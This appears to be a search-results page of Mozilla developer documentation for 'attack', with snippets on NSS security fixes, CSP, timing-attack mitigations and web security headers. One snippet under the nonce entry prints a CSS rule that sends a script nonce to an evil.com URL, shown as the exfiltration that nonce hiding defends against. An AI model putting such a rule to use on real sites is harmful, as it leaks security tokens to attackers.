bug 525056: timing attack against ssl3ext.c:ssl3_serverhandlesessionticketxtn() bug 526689: ssl3 & tls renegotiation vulnerability documentation for a list of the primary nss documentation pages on mozilla.org, see nss documentation.
NSS 3.19.1 release notes
this patch release includes a fix for the recently published logjam attack.
NSS 3.19.2.3 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.21.1 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.22.2 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.23 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.
NSS 3.36.6 release notes
this is a patch release to fix cve-2018-12404 bugs fixed in nss 3.36.6 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1389967 and bug 1448748 - fixes for mingw on x64 platforms.
NSS 3.40.1 release notes
this is a patch release to fix cve-2018-12404 new functions none bugs fixed in nss 3.40.1 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) compatibility nss 3.40.1 shared libraries are backward compatible with all older nss 3.x shared libraries.
NSS 3.41 release notes
gerprint: 27995829fe6a7515c1bfe848f9c4761db16c225929257bf40d0894f29ea8baf2 cn = opentrust root ca g3 sha-256 fingerprint: b7c36231706e81078c367cb896198f1e3208dd926949dd8f5709a410f75b6292 bugs fixed in nss 3.41 bug 1412829, reject empty supported_signature_algorithms in certificate request in tls 1.2 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1481271 - resend the same ticket in clienthello after helloretryrequest bug 1493769 - set session_id for external resumption tokens bug 1507179 - reject ccs after handshake is complete in tls 1.3 this bugzilla query returns all the bugs fixed in nss 3.41: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advan...
nss tech note7
to prevent denial-of-service attacks with huge public keys, nss disallows modulus size greater than 8192 bits.
Notes on TLS - SSL 3.0 Intolerant Servers
technical information the ssl 3.0 and tls (aka ssl 3.1) specs both contain a provision -- the same provision -- for detecting "version rollback attacks".
NSS environment variables
3.12 nss_ssl_cbc_random_iv string ("0", "1") controls the workaround for the beast attack on ssl 3.0 and tls 1.0.
sslintro.html
specifies a callback function used to authenticate an incoming certificate (optional for servers, necessary for clients to avoid "man-in-the-middle" attacks).
Zest tools
the following tools currently support zest: owasp zed attack proxy the zap add-on allows the user to create, edit and run zest scripts.
Components.utils.Sandbox
if the sandbox interacts with untrusted content this should be set to false when possible to further reduce possible attack surface.
nsIURI
this is useful for authentication, managing sessions, or for checking the origin of an uri to prevent cross-site scripting attacks while using methods such as window.postmessage().
Setting HTTP request headers
by not advertising to all sites what extensions are installed this improves both privacy (this makes it harder to track a user known by his set of plugins, addons and extensions) and security (some plugins, addons and extensions may be known to have flaws by attackers).
Storage
by binding the parameters, you prevent possible sql injection attacks since a bound parameter can never be executed as sql.
Debugger-API - Firefox Developer Tools
by design, it ought not to introduce security holes, so in principle it could be made available to content as well; but it is hard to justify the security risks of the additional attack surface.
Cookies - Firefox Developer Tools
same-site cookies allow servers to mitigate the risk of csrf and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
Animation.currentTime - Web APIs
her animation's currenttime to half her keyframeeffect's duration: alicechange.currenttime = alicechange.effect.timing.duration / 2; a more generic means of seeking to the 50% mark of an animation would be: animation.currenttime = animation.effect.getcomputedtiming().delay + animation.effect.getcomputedtiming().activeduration / 2; reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.currenttime might get rounded depending on browser settings.
Animation.startTime - Web APIs
waapicats.appendchild(newcat); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.starttime might get rounded depending on browser settings.
AnimationPlaybackEvent.currentTime - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of playbackevent.currenttime might get rounded depending on browser settings.
AnimationTimeline.currentTime - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animationtimeline.currenttime might get rounded depending on browser settings.
AudioParam - Web APIs
var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); specifications specification status comment web audio apithe definition of 'audioparam' in that specification.
AuthenticatorAssertionResponse.authenticatorData - Web APIs
the server will ensure that this hash matches a hash of its own origin in order to prevent phishing or other man-in-the-middle attacks.
BaseAudioContext.createDynamicsCompressor() - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
BaseAudioContext.currentTime - Web APIs
console.log(audioctx.currenttime); reduced time precision to offer protection against timing attacks and fingerprinting, the precision of audioctx.currenttime might get rounded depending on browser settings.
Constraint validation API - Web APIs
even though client-side validation can prevent many common kinds of invalid values, invalid ones can still be sent by older browsers or by attackers trying to trick your web application.
DynamicsCompressorNode() - Web APIs
options optional options are as follows: attack: the amount of time (in seconds) to reduce the gain by 10db.
DynamicsCompressorNode.knee - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.ratio - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.release - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.threshold - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Event.timeStamp - Web APIs
</p> <p>timestamp: <span id="time">-</span></p> javascript function gettime(event) { var time = document.getelementbyid("time"); time.firstchild.nodevalue = event.timestamp; } document.body.addeventlistener("keypress", gettime); result reduced time precision to offer protection against timing attacks and fingerprinting, the precision of event.timestamp might get rounded depending on browser settings.
File.lastModified - Web APIs
const filewithdate = new file([], 'file.bin', { lastmodified: new date(2017, 1, 1), }); console.log(filewithdate.lastmodified); //returns 1485903600000 const filewithoutdate = new file([], 'file.bin'); console.log(filewithoutdate.lastmodified); //returns current time reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodified might get rounded depending on browser settings.
File.lastModifiedDate - Web APIs
ut is a htmlinputelement: <input type="file" multiple id="myfileinput"> var fileinput = document.getelementbyid("myfileinput"); // files is a filelist object (similar to nodelist) var files = fileinput.files; for (var i = 0; i < files.length; i++) { alert(files[i].name + " has a last modified date of " + files[i].lastmodifieddate); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodifieddate.gettime() might get rounded depending on browser settings.
HTMLMediaElement.currentTime - Web APIs
example var video = document.createelement('video'); console.log(video.currenttime); usage notes reduced time precision to offer protection against timing attacks and fingerprinting, browsers may round or otherwise adjust the value returned by currenttime.
HTMLOrForeignElement.nonce - Web APIs
nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this: script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); } specifications specification html living standardthe definition of 'nonce' in that specification.
Node.textContent - Web APIs
moreover, using textcontent can prevent xss attacks.
Pbkdf2Params - Web APIs
in this context, slow is good, since it makes it more expensive for an attacker to run a dictionary attack against the keys.
Push API - Web APIs
see the following articles for more information: cross-site request forgery (csrf) prevention cheat sheet preventing csrf and xsrf attacks for an app to receive push messages, it has to have an active service worker.
RTCIceCandidate.usernameFragment - Web APIs
this avoids crosstalk among multiple ongoing ice sessions, but, more importantly, helps secure ice transactions (and all of webrtc by extension) against attacks that might try to inject themselves into an ice exchange.
Service Worker API - Web APIs
having modified network requests, wide open to man in the middle attacks would be really bad.
SubtleCrypto.deriveKey() - Web APIs
the more times the process is repeated, the more computationally expensive key derivation is: this makes it harder for an attacker to use brute-force to discover the key using a dictionary attack.
TextDecoder.prototype.encoding - Web APIs
it is used to prevent attacks that mismatch encodings between the client and server.
Writing WebSocket servers - Web APIs
however, the server can deny them if they attempt too many connections in order to save itself from denial-of-service attacks.
Geometry and reference spaces in WebXR - Web APIs
const radians_per_degree = math.pi / 180.0; let degreestoradians = (deg) => deg * radians_per_degree; let radianstodegrees = (rad) => rad / radians_per_degree; times and durations note that for security reasons, domhighrestimestamp usually introduces a small amount of imprecision to the clock in order to prevent it from being used in fingerprinting and timing-based attacks.
Web Authentication API - Web APIs
this resolves significant security problems related to phishing, data breaches, and attacks against sms texts or other second-factor authentication methods while at the same time significantly increasing ease of use (since users don't have to manage dozens of increasingly complicated passwords).
Window.crypto - Web APIs
although the property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.
@document - CSS: Cascading Style Sheets
this has been limited to use only in user and ua sheets in firefox 59 in nightly and beta — an experiment designed to mitigate potential css injection attacks (see bug 1035091).
HTML5 Parser - Developer guides
if an attacker could force a premature end-of-file, the parser might change which parts of the document it considered to be executable scripts.
Introduction to HTML5 - Developer guides
This was done to tighten security and prevent some types of attacks.
<a>: The Anchor element - HTML: Hypertext Markup Language
Using target="_blank" without rel="noreferrer" and rel="noopener" makes the website vulnerable to window.opener API exploitation attacks (vulnerability description), although note that, in newer browser versions (e.g.
<iframe>: The Inline Frame element - HTML: Hypertext Markup Language
Sandboxing is useless if the attacker can display content outside a sandboxed iframe — such as if the viewer opens the frame in a new tab.
<input type="hidden"> - HTML: Hypertext Markup Language
This kind of attack is called a cross-site request forgery (CSRF); pretty much any reputable server-side framework uses hidden secrets to prevent such attacks.
<meta>: The Document-level Metadata element - HTML: Hypertext Markup Language
Content policies mostly specify allowed server origins and script endpoints, which help guard against cross-site scripting attacks.
HTTP authentication - HTTP
From Firefox 59 onwards, image resources loaded from different origins to the current document are no longer able to trigger HTTP authentication dialogs (bug 1423146), preventing user credentials being stolen if attackers were able to embed an arbitrary image into a third-party page.
Connection management in HTTP/1.x - HTTP
Persistent connections also have drawbacks; even when idling they consume server resources, and under heavy load, DoS attacks can be conducted.
Cross-Origin Resource Policy (CORP) - HTTP
Cross-Origin Resource Policy is a policy set by the Cross-Origin-Resource-Policy HTTP header that lets web sites and applications opt in to protection against certain requests from other origins (such as those issued with elements like <script> and <img>), to mitigate speculative side-channel attacks, like Spectre, as well as cross-site script inclusion attacks.
CSP: base-uri - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: child-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: connect-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: default-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: font-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: form-action - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: frame-ancestors - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: frame-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: img-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: manifest-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: media-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: navigate-to - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: object-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: prefetch-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: script-src-attr - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: script-src-elem - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: script-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: style-src-attr - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: style-src-elem - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: style-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
CSP: trusted-types - HTTP
This allows authors to define rules guarding writing values to the DOM and thus reducing the DOM XSS attack surface to small, isolated parts of the web application codebase, facilitating their monitoring and code review.
CSP: upgrade-insecure-requests - HTTP
The upgrade-insecure-requests directive will not ensure that users visiting your site via links on third-party sites will be upgraded to HTTPS for the top-level navigation and thus does not replace the Strict-Transport-Security (HSTS) header, which should still be set with an appropriate max-age to ensure that users are not subject to SSL stripping attacks.
CSP: worker-src - HTTP
This is insecure; an attacker can also inject arbitrary data: URIs.
Content-Security-Policy - HTTP
This helps guard against cross-site scripting attacks (XSS).
Cross-Origin-Opener-Policy - HTTP
COOP will process-isolate your document, and potential attackers can't access your global object if they were opening it in a popup, preventing a set of cross-origin attacks dubbed XS-Leaks.
Public-Key-Pins - HTTP
The HTTP Public-Key-Pins response header used to associate a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates; however, it has been removed from modern browsers and is no longer supported.
Server - HTTP
Avoid overly detailed Server values, as they can reveal information that might make it (slightly) easier for attackers to exploit known security holes.
SameSite cookies - HTTP
None used to be the default value, but recent browser versions made Lax the default value to have reasonably robust defense against some classes of cross-site request forgery (CSRF) attacks.
X-Frame-Options - HTTP
Sites can use this to avoid click-jacking attacks, by ensuring that their content is not embedded into other sites.
414 URI Too Long - HTTP
There are a few rare conditions when this might occur: when a client has improperly converted a POST request to a GET request with long query information, when the client has descended into a loop of redirection (for example, a redirected URI prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit potential security holes.
425 Too Early - HTTP
The HyperText Transfer Protocol (HTTP) 425 Too Early response status code indicates that the server is unwilling to risk processing a request that might be replayed, which creates the potential for a replay attack.
Grammar and types - JavaScript
(This is similar to string interpolation features in Perl, Python, and more.) Optionally, a tag can be added to allow the string construction to be customized, avoiding injection attacks, or constructing higher-level data structures from string contents.
Date.prototype.getTime() - JavaScript
Reduced time precision
To offer protection against timing attacks and fingerprinting, the precision of new Date().getTime() might get rounded depending on browser settings.
Date.now() - JavaScript
Engines which have not been updated to support this method can work around the absence of this method using the following shim:
if (!Date.now) { Date.now = function now() { return new Date().getTime(); }; }
Examples
Reduced time precision
To offer protection against timing attacks and fingerprinting, the precision of Date.now() might get rounded depending on browser settings.
SharedArrayBuffer - JavaScript
For top-level documents, two headers will need to be set to cross-origin isolate your site:
Cross-Origin-Opener-Policy with same-origin as value (protects your origin from attackers)
Cross-Origin-Embedder-Policy with require-corp as value (protects victims from your origin)
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
To check if cross-origin isolation has been successful, you can test against the crossOriginIsolated property available to window and worker contexts:
if (crossOriginIsolated) {
  // post SharedArrayBuffer
} else {...
eval() - JavaScript
More importantly, third-party code can see the scope in which eval() was invoked, which can lead to possible attacks in ways to which the similar Function is not susceptible.
Same-origin policy - Web security
It helps isolate potentially malicious documents, reducing possible attack vectors.